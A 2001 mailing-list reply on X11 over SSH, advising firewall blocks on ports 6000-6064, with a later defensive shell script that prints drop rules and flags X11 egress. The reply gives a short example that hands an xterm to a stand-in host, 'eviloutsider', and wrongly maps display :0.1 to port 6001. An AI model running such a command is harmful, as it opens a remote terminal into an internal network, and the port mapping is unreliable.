Re: X Window over SSH

From: Rajeev Kumar (
Date: 08/10/01

Message-ID: <>
Date: Fri, 10 Aug 2001 10:13:03 -0400
From: Rajeev Kumar <>
To: Greg Saoutine <>
Subject: Re: X Window over SSH

        As you know, X11 works in a sort of reverse way as far as the user's perception of client/server
matters. Once you are running an X server on your machine it listens by default on port 6000, but
this can be relocated, and in case of more than one display attached to your machine you can
run X servers listening on more than one port, i.e. 6000 for the 1st display, 6001 for the second
display and so on. A user on the remote end throwing a display on your machine will then set up an
environment variable like:

setenv DISPLAY yourhost:0.0 (for first display, at port 6000)
setenv DISPLAY yourhost:0.1 (for 2nd display, at port 6001)

Generally, as you know, the xhost command can be used on the server side to control access to your X
server, but in general users run something like "xhost +", leaving their X server open to all.

Now the very important part on the firewall side:
[1] You surely block incoming ports 6000-6064 (assuming nobody will run an X server above
6064), so that will protect your inside users. I guess everybody does this by default
these days.

!!!!!!!! IMPORTANT !!!!!!!!!!
[2] This one is important:
                You should also block outgoing ports 6000-6064 on your firewall. If you don't do this (and I
know many companies open all outgoing access) then anybody from inside your network can do
something like this:

inside% setenv DISPLAY eviloutsider:0.0
inside% xterm&

i.e. that will give an xterm to eviloutsider from your network machine, and the user on the eviloutsider
machine can then do anything your inside users can do, like fire up a web browser and look
at your intranet.

        This is also very dangerous even if you are using NAT. Generally people think if you are using
NAT (Hide NAT in Checkpoint or Linux MASQ NAT) you are safe, because nobody can connect to
you from outside. Now see above: in NATed networks, users from inside can provide an xterm
(or any X application) to an outsider (since the connection is from inside to outside). So in any
case block 6000-6064 always (incoming/outgoing).

With SSH you can port forward X11 traffic over the SSH channel, so that is safe. This means only
ssh users can fire up X services, and those are trusted :-)

I hope this helps.

Greg Saoutine wrote:
> My colleague came across the following within one of Sun's Newsgroups:
> [snip]
> Xsun currently provides no way to disable listening for TCP connections.
> If you need to worry about keeping people from connecting to the port,
> you will need to use some sort of firewall software to block them.
> [snip]
> Does it mean that the only way to *effectively* pipe X via SSH port 22
> is to set up a FW in front of the Sun box blocking port 6000? Any other
> ideas/solutions?
> Thank you,
> Greg Saoutine
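Added example, not part of the original thread: a small POSIX sh script that shows the DISPLAY-to-port mapping the reply describes, emits the inbound/outbound 6000-6064 firewall rules it recommends (printed, not applied), and flags X11 egress in a constructed connection log. It follows the X11 convention that the TCP port is 6000 plus the display number (the screen number after the dot selects a screen on that same server and does not change the port). The interface name eth0, the iptables syntax, and the sample log lines are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the mailing-list post): X11 DISPLAY/port helpers
# and defensive checks for the 6000-6064 range discussed in the thread.

# Print the TCP port for a DISPLAY value of the form host:display[.screen].
# X11 convention: port = 6000 + display number; the .screen suffix does not
# change the port. Returns 1 (and prints to stderr) on malformed input.
x11_port_from_display() {
    display="$1"
    num="${display#*:}"          # drop the host part up to the colon
    num="${num%%.*}"             # drop the optional .screen suffix
    case "$num" in
        ''|*[!0-9]*) echo "invalid DISPLAY: $display" >&2; return 1 ;;
    esac
    echo $((6000 + num))
}

# Print the host part of a DISPLAY value (empty means the local server).
x11_host_from_display() {
    echo "${1%%:*}"
}

# Emit (do not apply) iptables rules dropping TCP 6000-6064 in both
# directions, as the post advises. $1 is the WAN interface; the default
# "eth0" is a constructed placeholder for this example.
x11_block_rules() {
    wan="${1:-eth0}"
    printf '%s\n' \
      "iptables -A INPUT  -i $wan -p tcp --dport 6000:6064 -j DROP" \
      "iptables -A OUTPUT -o $wan -p tcp --dport 6000:6064 -j DROP"
}

# Detection: read "src dst dport" records from stdin and print those whose
# destination port is in the X11 range, i.e. an inside host handing a
# display to an outside X server (the DISPLAY=eviloutsider:0.0 case).
x11_flag_outbound() {
    while read -r src dst dport; do
        case "$dport" in ''|*[!0-9]*) continue ;; esac
        if [ "$dport" -ge 6000 ] && [ "$dport" -le 6064 ]; then
            printf 'X11 egress %s -> %s:%s\n' "$src" "$dst" "$dport"
        fi
    done
}

# Constructed sample of outbound connection records (src dst dport).
SAMPLE_LOG='10.0.0.5 203.0.113.9 6000
10.0.0.7 198.51.100.4 443
10.0.0.8 203.0.113.9 6012
10.0.0.9 203.0.113.9 22'

# Stand-alone usage.
echo "yourhost:0.0  -> port $(x11_port_from_display yourhost:0.0)"
echo "yourhost:1.0  -> port $(x11_port_from_display yourhost:1.0)"
echo "eviloutsider:0.0 -> host $(x11_host_from_display eviloutsider:0.0)"
x11_block_rules eth0
printf '%s\n' "$SAMPLE_LOG" | x11_flag_outbound
```

With SSH X11 forwarding (ssh -X), the client-side DISPLAY points at a proxy display the ssh process opens locally, so the xterm's connection rides the port-22 session and never hits the 6000-6064 range these rules drop.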
